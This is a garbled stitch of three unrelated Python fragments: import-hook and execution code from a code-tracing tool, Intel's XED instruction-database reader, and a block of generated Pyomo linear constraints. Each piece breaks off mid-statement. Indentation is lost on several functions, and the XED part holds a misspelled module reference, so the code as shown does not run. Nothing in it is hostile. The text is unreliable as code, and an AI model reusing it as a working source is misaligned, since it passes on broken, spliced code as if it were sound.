        if module_spec:
            module_file = module_spec.origin
        else:
            module_file = self.traced_file
        parsed_filename = module_file
        # Choose where the source text comes from.
        if (self.traced.startswith(DEFAULT_MODULE_NAME) or
                self.traced.startswith(LIVE_MODULE_NAME)):
            # Tracing the pseudo module: source was captured from stdin.
            source_code = self.source_code
            parsed_filename = PSEUDO_FILENAME
        elif self.traced_file is not None and module_file == self.traced_file:
            # The file being replaced: lazily cache its contents.
            if self.source_code is None:
                with open(self.traced_file) as source_file:
                    self.source_code = source_file.read()
            source_code = self.source_code
        else:
            with open(module_file) as source_file:
                source_code = source_file.read()
        module_name = module.__name__
        is_module_traced = False
        source_tree = None
        if self.traced == module_name:
            # The whole module is traced.
            is_module_traced = True
            self.source_finder = TracedFinder(source_code, '', parsed_filename)
        else:
            # Maybe a child (function/class/method) of this module is traced.
            if self.traced.startswith(module_name):
                traced_child = self.traced[len(module_name)+1:]
            elif self.traced in (DEFAULT_MODULE_NAME, LIVE_MODULE_NAME):
                traced_child = self.traced
            else:
                traced_child = None
            if traced_child:
                source_finder = TracedFinder(source_code,
                                             traced_child,
                                             parsed_filename)
                source_tree = source_finder.source_tree
                if source_finder.traced_node is not None:
                    is_module_traced = True
                    self.source_finder = source_finder
                else:
                    # Traced target not found here: hand back to the loader we
                    # displaced in find_spec, if any.
                    original_loader = self.original_loaders.get(module.__name__)
                    if original_loader is not None:
                        module_spec.loader = original_loader
                        return original_loader.exec_module(module)
        if source_tree is None:
            source_tree = parse(source_code, parsed_filename)
        if is_module_traced:
            source_tree = trace_source_tree(source_tree)
            self.is_traced_module_imported = True
        # Work out the package context for relative imports inside the module.
        if (module_name in (DEFAULT_MODULE_NAME, LIVE_MODULE_NAME) and
                self.driver_module):
            target_module = self.driver_module
        else:
            target_module = module_name
        if '.' in target_module:
            package_name, child_name = target_module.rsplit('.', 1)
        else:
            package_name = None
        module.__package__ = package_name
        module.__file__ = module_file
        module.__builtins__ = builtins
        # Share one globals dict so the report builder and traced names are
        # visible across the traced run.
        module.__dict__.update(self.environment)
        self.environment = module.__dict__
        # from ast import dump
        # print(dump(source_tree, include_attributes=True))
        compiled_code = compile(source_tree, PSEUDO_FILENAME, 'exec')
        exec(compiled_code, self.environment)
def run_main(self):
if self.driver_module is None:
try:
driver_path = self.driver and str(Path(self.driver[0]).resolve())
except FileNotFoundError:
driver_path = self.driver and self.driver[0] or ''
self.is_traced_module_imported = (not self.driver or
self.traced_file == driver_path)
self.run_python_file(
self.driver and self.driver[0],
source_code=(self.source_code
if self.is_traced_module_imported
else None))
else:
self.run_python_module(self.driver_module)
    def run_python_module(self, modulename):
        """ Run a python module, as though with ``python -m name args...``.

        :param str modulename: the name of the module, possibly dot separated.

        This is based on code from coverage.py, by Ned Batchelder.
        https://bitbucket.org/ned/coveragepy
        """
        spec = find_spec(modulename)
        if spec is not None:
            pathname = spec.origin
            packagename = spec.name
        elif (self.traced in (DEFAULT_MODULE_NAME,
                              LIVE_MODULE_NAME) and
                self.source_code):
            # Module not importable, but replacement source was supplied
            # for the traced pseudo-module: fall back to the traced file.
            pathname = self.traced_file
            packagename = self.driver_module
        else:
            raise ImportError(modulename)
        if pathname.endswith("__init__.py") and not modulename.endswith("__init__"):
            # The name refers to a package: execute its __main__ submodule,
            # exactly as "python -m package" would.
            mod_main = modulename + ".__main__"
            spec = find_spec(mod_main)
            if not spec:
                raise ImportError(
                    "No module named %s; "
                    "%r is a package and cannot be directly executed"
                    % (mod_main, modulename))
            pathname = spec.origin
            packagename = spec.name
        # Run inside the parent package, so relative imports resolve.
        packagename = packagename.rpartition(".")[0]
        # Finally, hand the file off to run_python_file for execution.
        pathname = os.path.abspath(pathname)
        self.run_python_file(pathname, package=packagename)
    def run_python_file(self, filename, package=None, source_code=None):
        """Run a python file as if it were the main program on the command line.

        :param str filename: the path to the file to execute.
        :param str package: the package name to set on the module.
        :param str source_code: custom source code to replace the file contents.
        """
        # Inspect the interpreter call stack to find the script that
        # started this process, so sys.path[0] can be validated below.
        call_stack_files = [frame[0].f_code.co_filename
                            for frame in inspect.stack()]
        top_file = call_stack_files[-1]
        if os.path.basename(top_file) == 'runpy.py':
            # Exclude runpy.py, used for python -m.
            call_stack_files = [
                frame_filename
                for frame_filename in call_stack_files
                if os.path.basename(frame_filename) != 'runpy.py']
            top_file = os.path.dirname(call_stack_files[-1])
        expected_path0 = os.path.abspath(os.path.dirname(top_file))
        # Check that sys.path is as expected, otherwise leave it alone.
        if os.path.abspath(sys.path[0]) == expected_path0:
            if package is not None:
                # add current directory to Python path
                sys.path[0] = os.getcwd()
            else:
                # Set sys.path to target script's folder instead of space_tracer.
                sys.path[0] = os.path.abspath(os.path.dirname(filename))
        # Create a module to serve as __main__
        module_name = (LIVE_MODULE_NAME
                       if self.traced == LIVE_MODULE_NAME
                       else DEFAULT_MODULE_NAME)
        main_mod = types.ModuleType(module_name)
        sys.modules[module_name] = main_mod
        main_mod.__file__ = filename
        main_mod.__builtins__ = builtins
        if package:
            main_mod.__package__ = package
        code = self.make_code_from_py(filename, source_code)
        if self.driver_finder.is_tracing:
            # Share the tracer's environment with __main__ so traced
            # state stays visible after execution.
            main_mod.__dict__.update(self.environment)
            self.environment = main_mod.__dict__
        # Execute the code object.
        exec(code, main_mod.__dict__)
    def make_code_from_py(self, filename, source):
        """Get source from `filename` and make a code object of it.

        :param str filename: file to load; may be None when *source* is given.
        :param str source: replacement source text, or None to read the file
            (or reuse the traced file's source when *filename* is it).
        :return: the compiled code object, ready to exec.
        """
        traced = self.traced
        if source is None:
            if (self.traced_file is not None and
                    (os.path.abspath(self.traced_file) ==
                     os.path.abspath(filename)) and
                    self.source_code is not None):
                # The driver IS the traced file: reuse its source.
                source = self.source_code
                traced = self.traced or DEFAULT_MODULE_NAME
            else:
                with open(filename) as source_file:
                    source = source_file.read()
        if traced:
            # Strip the pseudo-module prefix so TracedFinder searches for
            # the remaining dotted path inside this source.
            if traced.startswith(DEFAULT_MODULE_NAME):
                traced = traced[len(DEFAULT_MODULE_NAME)+1:]
                self.is_traced_module_imported = True
            elif traced.startswith(LIVE_MODULE_NAME):
                traced = traced[len(LIVE_MODULE_NAME)+1:]
                self.is_traced_module_imported = True
            parsed_file = PSEUDO_FILENAME if traced == '' else filename
            self.driver_finder = TracedFinder(source,
                                              traced,
                                              parsed_file)
            to_compile = self.driver_finder.source_tree
            if (traced == '' or
                    self.driver_finder.traced_node is not None):
                # Whole module traced, or the traced target lives here.
                to_compile = trace_source_tree(to_compile)
                self.driver_finder.is_tracing = True
        else:
            self.driver_finder = TracedFinder(source, '', PSEUDO_FILENAME)
            to_compile = self.driver_finder.source_tree
        code = compile(to_compile, filename or PSEUDO_FILENAME, "exec")
        return code
def report_driver_result(self, messages):
if self.traced in (DEFAULT_MODULE_NAME, LIVE_MODULE_NAME):
# Error is already visible, no extra display needed.
return
messages = list(split_lines(messages))
block_size = len(messages) + 2
self.report_builder.start_block(1, block_size)
message_width = 1
for lineno, message in enumerate(messages, 2):
message_width = max(len(message), message_width)
self.report_builder.add_message(message, lineno)
header = '-' * message_width + ' '
self.report_builder.add_message(header, 1)
self.report_builder.add_message(header, block_size)
self.report_builder.start_block(1, block_size)
self.report_builder.trace_extra_block(1, block_size)
def split_lines(messages):
    """Yield every physical line from an iterable of multi-line messages."""
    for message in messages:
        yield from message.splitlines()
class PatchedModuleFinder(DelegatingModuleFinder):
    """Intercepts imports of selected modules so their loaders can be wrapped."""
    # NOTE(review): not referenced in this chunk — presumably toggled by
    # callers as a fallback-import flag; confirm before relying on it.
    is_desperate = False

    def __init__(self, is_zoomed):
        self.is_zoomed = is_zoomed

    def find_spec(self, fullname, path, target=None):
        """Wrap the loader of plotting/random modules with PatchedModuleLoader."""
        patched_names = ('matplotlib',
                         'matplotlib.pyplot',
                         'numpy.random',
                         'random',
                         'pyglet')
        if fullname not in patched_names:
            return None
        spec = super(PatchedModuleFinder, self).find_spec(fullname, path, target)
        if spec is None:
            return None
        spec.loader = PatchedModuleLoader(fullname,
                                          spec.loader,
                                          self.is_zoomed)
        return spec
# noinspection PyAbstractClass
class PatchedModuleLoader(Loader):
    def __init__(self, fullname, main_loader, is_zoomed):
        """Wrap *main_loader* so the module can be patched after loading.

        :param fullname: dotted name of the module being imported.
        :param main_loader: original loader to delegate to; may be None.
        :param is_zoomed: display flag forwarded from the finder.
        """
        self.fullname = fullname
        self.main_loader = main_loader
        self.is_zoomed = is_zoomed
        # Filled with the pyplot module once it has been imported.
        self.plt = None
    def exec_module(self, module):
        """Execute the module normally, then patch it for repeatable output."""
        if self.main_loader is not None:
            self.main_loader.exec_module(module)
        if self.fullname in ('numpy.random', 'random'):
            # Fixed seed keeps traced runs deterministic.
            module.seed(0)
        elif self.fullname == 'matplotlib':
            # Headless backend: no GUI windows pop up during tracing.
            module.use('Agg')
        elif self.fullname == 'matplotlib.pyplot':
            self.plt = module
# noinspection | |
# file: sniper/xed/pysrc/read_xed_db.py
#!/usr/bin/env python
# -*- python -*-
#BEGIN_LEGAL
#
#Copyright (c) 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#END_LEGAL
import os
import sys
import re
import collections
import patterns
import slash_expand
import genutil
import opnd_types
import opnds
def die(s):
    """Print an error message and abort with a non-zero exit status.

    The message goes to stderr so diagnostics are not mixed into any
    generated output that a caller may be capturing from stdout.

    :param s: text of the error message.
    """
    sys.stderr.write("ERROR: {0}\n".format(s))
    sys.exit(1)
def msgb(b, s=''):
    """Write a tagged progress message, ``[TAG] details``, to stdout."""
    sys.stdout.write("[%s] %s\n" % (b, s))
class inst_t(object):
    """Record holding one instruction definition.

    Attributes are attached dynamically by xed_reader_t as lower-cased
    key/value pairs parsed from the instruction input files.
    """
    def __init__(self):
        pass
class width_info_t(object):
    """An operand-width name with its per-mode widths in bits."""
    def __init__(self, name, dtype, widths):
        """ a name and a list of widths, 8, 16, 32, and 64b.

        :param name: width name; stored upper-cased.
        :param dtype: default data type associated with this width.
        :param widths: list of bit-width strings for 8/16/32/64b modes.
        """
        self.name = name.upper()
        self.dtype = dtype
        self.widths = widths
completely_numeric = re.compile(r'^[0-9]+$') # only numbers
def _is_bits(val):
"""Return a number if the value is in explicit bits form:
[0-9]+bits, or None"""
global completely_numeric
length = len(val)
if length > 4:
if val[-4:] == "bits":
number_string = val[0:-4]
if completely_numeric.match(number_string):
return number_string
return None
class xed_reader_t(object):
"""This class is designed to be used on the partial build materials
collected up in early part of the build and dumped in to the
BUILDDIR/dgen directory. Once initialized, the recs attribute
is what you'll iterate over to access the instruction records.
"""
    def __init__(self,
                 state_bits_filename,
                 instructions_filename,
                 widths_filename,
                 element_types_filename):
        """Load all dgen build inputs and populate ``self.recs``.

        :param state_bits_filename: state-bit macro expansion file.
        :param instructions_filename: instruction definition file.
        :param widths_filename: operand width definition file.
        :param element_types_filename: operand element-type definition file.
        """
        # Helper tables must exist before the instruction lines are read.
        self.xtypes = self._gen_xtypes(element_types_filename)
        self.widths_dict = self._gen_widths(widths_filename)
        self.state_bits = self._parse_state_bits(state_bits_filename)
        # Filled by _process_input_lines from DELETE directives.
        self.deleted_unames = {}
        self.deleted_instructions = {}
        self.recs = self._process_lines(instructions_filename)
        # Post-processing passes. Order matters: _parse_operands reads
        # operand_list, which _generate_explicit_operands sets.
        self._find_opcodes()
        self._fix_real_opcode()
        self._generate_explicit_operands()
        self._parse_operands()
def _refine_widths_input(self,lines):
"""Return a list of width_info_t. Skip comments and blank lines"""
comment_pattern = re.compile(r'#.*$')
widths_list = []
for line in lines:
pline = comment_pattern.sub('',line).strip()
if pline == '':
continue
wrds = pline.split()
ntokens = len(wrds)
if ntokens == 3:
(name, dtype, all_width) = wrds
width8 = all_width
width16 = all_width
width32 = all_width
width64 = all_width
elif ntokens == 5:
width8='0'
(name, dtype, width16, width32, width64) = wrds
else:
die("Bad number of tokens on line: " + line)
# convert from bytes to bits, unless in explicit bits form "b'[0-9]+"
bit_widths = []
for val in [width8, width16, width32, width64]:
number_string = _is_bits(val)
if number_string:
bit_widths.append(number_string)
else:
bit_widths.append(str(int(val)*8))
widths_list.append(width_info_t(name, dtype, bit_widths))
return widths_list
def _gen_widths(self, fn):
lines = open(fn,'r').readlines()
widths_list = self._refine_widths_input(lines)
# sets the default data type for each width
widths_dict = {}
for w in widths_list:
widths_dict[w.name] = w.dtype
return widths_dict
def _gen_xtypes(self, fn):
lines = open(fn,'r').readlines()
xtypes_dict = opnd_types.read_operand_types(lines)
return set(xtypes_dict.keys())
    def _compute_explicit_operands(self,v):
        """Return the names of the record's explicit operands.

        Splits ``v.operands`` (also stored on the record as
        ``operand_list``) and keeps each operand's name unless its
        visibility token marks it IMPL/SUPP/ECOND; EXPL and unmarked
        operands are considered explicit.
        """
        # all operands
        v.operand_list = v.operands.split()
        # just the explicit ones
        expl_operand_list = []
        for opnd in v.operand_list:
            stg = None
            vis = None
            opname = None
            # Operands like "REG0=GPR:r:..." — name comes from the
            # "storage=name" piece, visibility from a later piece.
            if re.search(r'^[^:]*=',opnd):
                pieces = opnd.split(':')
                for i,p in enumerate(pieces):
                    if i == 0:
                        if '=' in p:
                            stg,opname = p.split('=')
                    elif p in ['IMPL', 'SUPP', 'EXPL', 'ECOND']:
                        vis = p
            # Immediates and memory operands: the name is the first piece.
            elif opnd.startswith('IMM0') or opnd.startswith('MEM0') or opnd.startswith('IMM1'):
                pieces = opnd.split(':')
                opname = pieces[0]
                for i,p in enumerate(pieces):
                    if i>0 and p in ['IMPL', 'SUPP', 'EXPL', 'ECOND']:
                        vis = p
            # Keep unless hidden; strip any parentheses from the name.
            if opname and vis not in ['IMPL', 'SUPP', 'ECOND']:
                expl_operand_list.append(re.sub(r'[()]*','',opname))
        return expl_operand_list
def _generate_explicit_operands(self):
for v in self.recs:
if not hasattr(v,'iform'):
v.iform=''
v.explicit_operands = self._compute_explicit_operands(v)
def _parse_operands(self):
'''set v.parsed_operands with list of operand_info_t objects (see opnds.py).'''
for v in self.recs:
v.parsed_operands = []
for op_str in v.operand_list:
#op is an operand_info_t object
op = opnds.parse_one_operand(op_str,
'DEFAULT',
self.xtypes,
self.widths_dict)
v.parsed_operands.append(op)
#print "OPERAND: {}".format(op)
def _fix_real_opcode(self):
for v in self.recs:
if not hasattr(v,'real_opcode'):
v.real_opcode='Y'
    def _find_opcodes(self):
        '''augment the records with information found by parsing the pattern'''
        # Regexes over the raw pattern string; compiled once per call.
        map_pattern = re.compile(r'MAP=(?P<map>[0-6])')
        vex_prefix = re.compile(r'VEX_PREFIX=(?P<prefix>[0-9])')
        rep_prefix = re.compile(r'REP=(?P<prefix>[0-3])')
        osz_prefix = re.compile(r'OSZ=(?P<prefix>[01])')
        no_prefix = re.compile(r'REP=0 OSZ=0')
        rexw_prefix = re.compile(r'REXW=(?P<rexw>[01])')
        reg_required = re.compile(r'REG[[](?P<reg>[b01]+)]')
        mod_required = re.compile(r'MOD[[](?P<mod>[b01]+)]')
        mod_mem_required = re.compile(r'MOD!=3')
        rm_required = re.compile(r'RM[[](?P<rm>[b01]+)]')
        mode_pattern = re.compile(r' MODE=(?P<mode>[012]+)')
        not64_pattern = re.compile(r' MODE!=2')
        for v in self.recs:
            # isa_set falls back to the extension name when absent.
            if not hasattr(v,'isa_set'):
                v.isa_set = v.extension
            v.undocumented = False
            if hasattr(v,'comment'):
                if 'UNDOC' in v.comment:
                    v.undocumented = True
            # Determine encoding space and opcode byte from the leading
            # pattern tokens.
            pattern = v.pattern.split()
            p0 = pattern[0]
            v.map = 0
            v.space = 'legacy'
            if p0 in ['0x0F']:
                # Legacy escape byte: 0x0F 0x38 / 0x0F 0x3A select maps 2/3.
                if pattern[1] == '0x38':
                    v.map = 2
                    opcode = pattern[2]
                elif pattern[1] == '0x3A':
                    v.map = 3
                    opcode = pattern[2]
                else:
                    v.map = 1
                    opcode = pattern[1]
            elif p0 == 'VEXVALID=1':
                v.space = 'vex'
                opcode = pattern[1]
            elif p0 == 'VEXVALID=2':
                v.space = 'evex'
                opcode = pattern[1]
            elif p0 == 'VEXVALID=4': #KNC
                v.space = 'evex.u0'
                opcode = pattern[1]
            elif p0 == 'VEXVALID=3':
                v.space = 'xop'
                opcode = pattern[1]
            else:
                opcode = p0
            v.opcode = opcode
            v.partial_opcode = False
            # An explicit MAP=n token overrides the escape-byte deduction.
            mp = map_pattern.search(v.pattern)
            if mp:
                v.map = int(mp.group('map'))
            v.no_prefixes_allowed = False
            if no_prefix.search(v.pattern):
                v.no_prefixes_allowed = True
            # Legacy 66/F2/F3 prefix requirements.
            v.osz_required = False
            osz = osz_prefix.search(v.pattern)
            if osz:
                if osz.group('prefix') == '1':
                    v.osz_required = True
            v.f2_required = False
            v.f3_required = False
            rep = rep_prefix.search(v.pattern)
            if rep:
                if rep.group('prefix') == '2':
                    v.f2_required = True
                elif rep.group('prefix') == '3':
                    v.f3_required = True
            # For VEX/EVEX/XOP, the embedded prefix field plays this role.
            if v.space in ['evex','vex', 'xop']:
                vexp = vex_prefix.search(v.pattern)
                if vexp:
                    if vexp.group('prefix') == '0':
                        v.no_prefixes_allowed = True
                    elif vexp.group('prefix') == '1':
                        v.osz_required = True
                    elif vexp.group('prefix') == '2':
                        v.f2_required = True
                    elif vexp.group('prefix') == '3':
                        v.f3_required = True
            v.rexw_prefix = "unspecified"
            rexw = rexw_prefix.search(v.pattern)
            if rexw:
                v.rexw_prefix = rexw.group('rexw') # 0 or 1
            # ModRM field constraints (reg/rm/mod), when the pattern pins them.
            v.reg_required = 'unspecified'
            reg = reg_required.search(v.pattern)
            if reg:
                v.reg_required = genutil.make_numeric(reg.group('reg'))
            v.rm_required = 'unspecified'
            rm = rm_required.search(v.pattern)
            if rm:
                v.rm_required = genutil.make_numeric(rm.group('rm'))
            v.mod_required = 'unspecified'
            mod = mod_required.search(v.pattern)
            if mod:
                v.mod_required = genutil.make_numeric(mod.group('mod'))
            mod = mod_mem_required.search(v.pattern)
            if mod:
                v.mod_required = '00/01/10'
            # 16/32/64b mode restrictions
            v.mode_restriction = 'unspecified'
            if not64_pattern.search(v.pattern):
                v.mode_restriction = 'not64'
            else:
                mode = mode_pattern.search(v.pattern)
                if mode:
                    v.mode_restriction = int(mode.group('mode'))
            v.scalar = False
            if hasattr(v,'attributes'):
                v.attributes = v.attributes.upper()
                if 'SCALAR' in v.attributes:
                    v.scalar = True
            # NOTE(review): nopcode is only bound when opcode starts with
            # '0x' or '0b'; any other token would raise NameError below —
            # confirm the input files guarantee one of those forms.
            if opcode.startswith('0x'):
                nopcode = int(opcode,16)
            elif opcode.startswith('0b'):
                # partial opcode.. 5 bits, shifted
                nopcode = genutil.make_numeric(opcode) << 3
                v.partial_opcode = True
            v.upper_nibble = int(nopcode/16)
            v.lower_nibble = nopcode & 0xF
def _parse_state_bits(self,f):
lines = open(f,'r').readlines()
d = []
state_input_pattern = re.compile(r'(?P<key>[^\s]+)\s+(?P<value>.*)')
while len(lines) > 0:
line = lines.pop(0)
line = patterns.comment_pattern.sub("",line)
line = patterns.leading_whitespace_pattern.sub("",line)
if line == '':
continue
line = slash_expand.expand_all_slashes(line)
p = state_input_pattern.search(line)
if p:
s = r'\b' + p.group('key') + r'\b'
pattern = re.compile(s)
d.append( (pattern, p.group('value')) )
else:
die("Bad state line: %s" % line)
return d
def _expand_state_bits_one_line(self,line):
new_line = line
for k,v in self.state_bits:
new_line = k.sub(v,new_line)
return new_line
def _process_lines(self,fn):
r = self._process_input_lines(fn)
r = self._expand_compound_values(r)
return r
def _expand_compound_value(self, in_rec):
""" v is dictionary of lists. return a list of those with one element per list"""
if len(in_rec['OPERANDS']) != len(in_rec['PATTERN']):
die("Mismatched number of patterns and operands lines")
x = len(in_rec['PATTERN'])
res = []
for i in range(0,x):
d = inst_t()
for k,v in in_rec.items():
if len(v) == 1:
setattr(d,k.lower(),v[0])
else:
if i >= len(v):
die("k = {0} v = {1}".format(k,v))
setattr(d,k.lower(),v[i])
res.append(d)
return res
def _delist(self,in_rec):
"""The valies in the record are lists. Remove the lists since they are
all now singletons """
n = inst_t()
for k,v in in_rec.items():
setattr(n,k.lower(),v[0])
return n
def _expand_compound_values(self,r):
n = []
for v in r:
if len(v['OPERANDS']) > 1 or len(v['PATTERN']) > 1:
t = self._expand_compound_value(v)
n.extend(t)
else:
n.append(self._delist(v))
return n
def _process_input_lines(self,fn):
"""We'll still have multiple pattern/operands/iform lines after reading this.
Stores each record in a list of dictionaries. Each dictionary has key-value pairs
and the value is always a list"""
started = False
recs = []
nt_name = "Unknown"
i = 0
for line in file(fn):
i = i + 1
if i > 500:
sys.stdout.write(".")
sys.stdout.flush()
i = 0
line = patterns.comment_pattern.sub("",line)
line=line.strip()
if line == '':
continue
line = slash_expand.expand_all_slashes(line)
if patterns.udelete_pattern.search(line):
m = patterns.udelete_full_pattern.search(line)
unamed = m.group('uname')
self.deleted_unames[unamed] = True
continue
if patterns.delete_iclass_pattern.search(line):
m = pattersn.delete_iclass_full_pattern.search(line)
iclass = m.group('iclass')
self.deleted_instructions[iclass] = True
continue
line = self._expand_state_bits_one_line(line)
p = patterns.nt_pattern.match(line)
if p:
nt_name = p.group('ntname')
continue
if patterns.left_curly_pattern.match(line):
if | |
m.x556 + m.x564 - m.x572 >= -50)
# Generated linear constraints c1692-c1722 over variables m.x322-m.x577.
# Reformatted one statement per line; every expression is identical to
# the generated original.
m.c1692 = Constraint(expr= m.x333 + m.x341 - m.x349 + m.x365 + m.x373 - m.x381 + m.x397 + m.x405 - m.x413 + m.x429 + m.x437 - m.x445 + m.x461 + m.x469 - m.x477 + m.x493 + m.x501 - m.x509 + m.x525 + m.x533 - m.x541 + m.x557 + m.x565 - m.x573 >= 0)
m.c1693 = Constraint(expr= m.x334 + m.x342 - m.x350 + m.x366 + m.x374 - m.x382 + m.x398 + m.x406 - m.x414 + m.x430 + m.x438 - m.x446 + m.x462 + m.x470 - m.x478 + m.x494 + m.x502 - m.x510 + m.x526 + m.x534 - m.x542 + m.x558 + m.x566 - m.x574 >= 0)
m.c1694 = Constraint(expr= m.x335 + m.x343 - m.x351 + m.x367 + m.x375 - m.x383 + m.x399 + m.x407 - m.x415 + m.x431 + m.x439 - m.x447 + m.x463 + m.x471 - m.x479 + m.x495 + m.x503 - m.x511 + m.x527 + m.x535 - m.x543 + m.x559 + m.x567 - m.x575 >= 0)
m.c1695 = Constraint(expr= m.x336 + m.x344 - m.x352 + m.x368 + m.x376 - m.x384 + m.x400 + m.x408 - m.x416 + m.x432 + m.x440 - m.x448 + m.x464 + m.x472 - m.x480 + m.x496 + m.x504 - m.x512 + m.x528 + m.x536 - m.x544 + m.x560 + m.x568 - m.x576 >= 0)
m.c1696 = Constraint(expr= m.x337 + m.x345 - m.x353 + m.x369 + m.x377 - m.x385 + m.x401 + m.x409 - m.x417 + m.x433 + m.x441 - m.x449 + m.x465 + m.x473 - m.x481 + m.x497 + m.x505 - m.x513 + m.x529 + m.x537 - m.x545 + m.x561 + m.x569 - m.x577 >= -50)
m.c1697 = Constraint(expr= m.x346 + m.x350 + m.x378 + m.x382 + m.x410 + m.x414 + m.x442 + m.x446 + m.x474 + m.x478 + m.x506 + m.x510 + m.x538 + m.x542 + m.x570 + m.x574 >= 0)
m.c1698 = Constraint(expr= m.x347 + m.x351 + m.x379 + m.x383 + m.x411 + m.x415 + m.x443 + m.x447 + m.x475 + m.x479 + m.x507 + m.x511 + m.x539 + m.x543 + m.x571 + m.x575 >= 0)
m.c1699 = Constraint(expr= m.x348 + m.x352 + m.x380 + m.x384 + m.x412 + m.x416 + m.x444 + m.x448 + m.x476 + m.x480 + m.x508 + m.x512 + m.x540 + m.x544 + m.x572 + m.x576 >= 0)
m.c1700 = Constraint(expr= m.x349 + m.x353 + m.x381 + m.x385 + m.x413 + m.x417 + m.x445 + m.x449 + m.x477 + m.x481 + m.x509 + m.x513 + m.x541 + m.x545 + m.x573 + m.x577 >= 0)
m.c1701 = Constraint(expr= - m.x322 - m.x354 - m.x386 - m.x418 - m.x450 - m.x482 - m.x514 - m.x546 <= 0)
m.c1702 = Constraint(expr= - m.x323 - m.x355 - m.x387 - m.x419 - m.x451 - m.x483 - m.x515 - m.x547 <= 100)
m.c1703 = Constraint(expr= - m.x324 - m.x356 - m.x388 - m.x420 - m.x452 - m.x484 - m.x516 - m.x548 <= 100)
m.c1704 = Constraint(expr= - m.x325 - m.x357 - m.x389 - m.x421 - m.x453 - m.x485 - m.x517 - m.x549 <= 100)
m.c1705 = Constraint(expr= - m.x326 - m.x358 - m.x390 - m.x422 - m.x454 - m.x486 - m.x518 - m.x550 <= 100)
m.c1706 = Constraint(expr= - m.x327 - m.x359 - m.x391 - m.x423 - m.x455 - m.x487 - m.x519 - m.x551 <= 0)
m.c1707 = Constraint(expr= - m.x328 - m.x360 - m.x392 - m.x424 - m.x456 - m.x488 - m.x520 - m.x552 <= 100)
m.c1708 = Constraint(expr= - m.x329 - m.x361 - m.x393 - m.x425 - m.x457 - m.x489 - m.x521 - m.x553 <= 100)
m.c1709 = Constraint(expr= m.x322 - m.x330 - m.x334 + m.x354 - m.x362 - m.x366 + m.x386 - m.x394 - m.x398 + m.x418 - m.x426 - m.x430 + m.x450 - m.x458 - m.x462 + m.x482 - m.x490 - m.x494 + m.x514 - m.x522 - m.x526 + m.x546 - m.x554 - m.x558 <= 75)
m.c1710 = Constraint(expr= m.x323 - m.x331 - m.x335 + m.x355 - m.x363 - m.x367 + m.x387 - m.x395 - m.x399 + m.x419 - m.x427 - m.x431 + m.x451 - m.x459 - m.x463 + m.x483 - m.x491 - m.x495 + m.x515 - m.x523 - m.x527 + m.x547 - m.x555 - m.x559 <= 100)
m.c1711 = Constraint(expr= m.x324 - m.x332 - m.x336 + m.x356 - m.x364 - m.x368 + m.x388 - m.x396 - m.x400 + m.x420 - m.x428 - m.x432 + m.x452 - m.x460 - m.x464 + m.x484 - m.x492 - m.x496 + m.x516 - m.x524 - m.x528 + m.x548 - m.x556 - m.x560 <= 100)
m.c1712 = Constraint(expr= m.x325 - m.x333 - m.x337 + m.x357 - m.x365 - m.x369 + m.x389 - m.x397 - m.x401 + m.x421 - m.x429 - m.x433 + m.x453 - m.x461 - m.x465 + m.x485 - m.x493 - m.x497 + m.x517 - m.x525 - m.x529 + m.x549 - m.x557 - m.x561 <= 100)
m.c1713 = Constraint(expr= m.x326 - m.x338 - m.x342 + m.x358 - m.x370 - m.x374 + m.x390 - m.x402 - m.x406 + m.x422 - m.x434 - m.x438 + m.x454 - m.x466 - m.x470 + m.x486 - m.x498 - m.x502 + m.x518 - m.x530 - m.x534 + m.x550 - m.x562 - m.x566 <= 100)
m.c1714 = Constraint(expr= m.x327 - m.x339 - m.x343 + m.x359 - m.x371 - m.x375 + m.x391 - m.x403 - m.x407 + m.x423 - m.x435 - m.x439 + m.x455 - m.x467 - m.x471 + m.x487 - m.x499 - m.x503 + m.x519 - m.x531 - m.x535 + m.x551 - m.x563 - m.x567 <= 25)
m.c1715 = Constraint(expr= m.x328 - m.x340 - m.x344 + m.x360 - m.x372 - m.x376 + m.x392 - m.x404 - m.x408 + m.x424 - m.x436 - m.x440 + m.x456 - m.x468 - m.x472 + m.x488 - m.x500 - m.x504 + m.x520 - m.x532 - m.x536 + m.x552 - m.x564 - m.x568 <= 100)
m.c1716 = Constraint(expr= m.x329 - m.x341 - m.x345 + m.x361 - m.x373 - m.x377 + m.x393 - m.x405 - m.x409 + m.x425 - m.x437 - m.x441 + m.x457 - m.x469 - m.x473 + m.x489 - m.x501 - m.x505 + m.x521 - m.x533 - m.x537 + m.x553 - m.x565 - m.x569 <= 100)
m.c1717 = Constraint(expr= m.x330 + m.x338 - m.x346 + m.x362 + m.x370 - m.x378 + m.x394 + m.x402 - m.x410 + m.x426 + m.x434 - m.x442 + m.x458 + m.x466 - m.x474 + m.x490 + m.x498 - m.x506 + m.x522 + m.x530 - m.x538 + m.x554 + m.x562 - m.x570 <= 100)
m.c1718 = Constraint(expr= m.x331 + m.x339 - m.x347 + m.x363 + m.x371 - m.x379 + m.x395 + m.x403 - m.x411 + m.x427 + m.x435 - m.x443 + m.x459 + m.x467 - m.x475 + m.x491 + m.x499 - m.x507 + m.x523 + m.x531 - m.x539 + m.x555 + m.x563 - m.x571 <= 100)
m.c1719 = Constraint(expr= m.x332 + m.x340 - m.x348 + m.x364 + m.x372 - m.x380 + m.x396 + m.x404 - m.x412 + m.x428 + m.x436 - m.x444 + m.x460 + m.x468 - m.x476 + m.x492 + m.x500 - m.x508 + m.x524 + m.x532 - m.x540 + m.x556 + m.x564 - m.x572 <= 50)
m.c1720 = Constraint(expr= m.x333 + m.x341 - m.x349 + m.x365 + m.x373 - m.x381 + m.x397 + m.x405 - m.x413 + m.x429 + m.x437 - m.x445 + m.x461 + m.x469 - m.x477 + m.x493 + m.x501 - m.x509 + m.x525 + m.x533 - m.x541 + m.x557 + m.x565 - m.x573 <= 100)
m.c1721 = Constraint(expr= m.x334 + m.x342 - m.x350 + m.x366 + m.x374 - m.x382 + m.x398 + m.x406 - m.x414 + m.x430 + m.x438 - m.x446 + m.x462 + m.x470 - m.x478 + m.x494 + m.x502 - m.x510 + m.x526 + m.x534 - m.x542 + m.x558 + m.x566 - m.x574 <= 100)
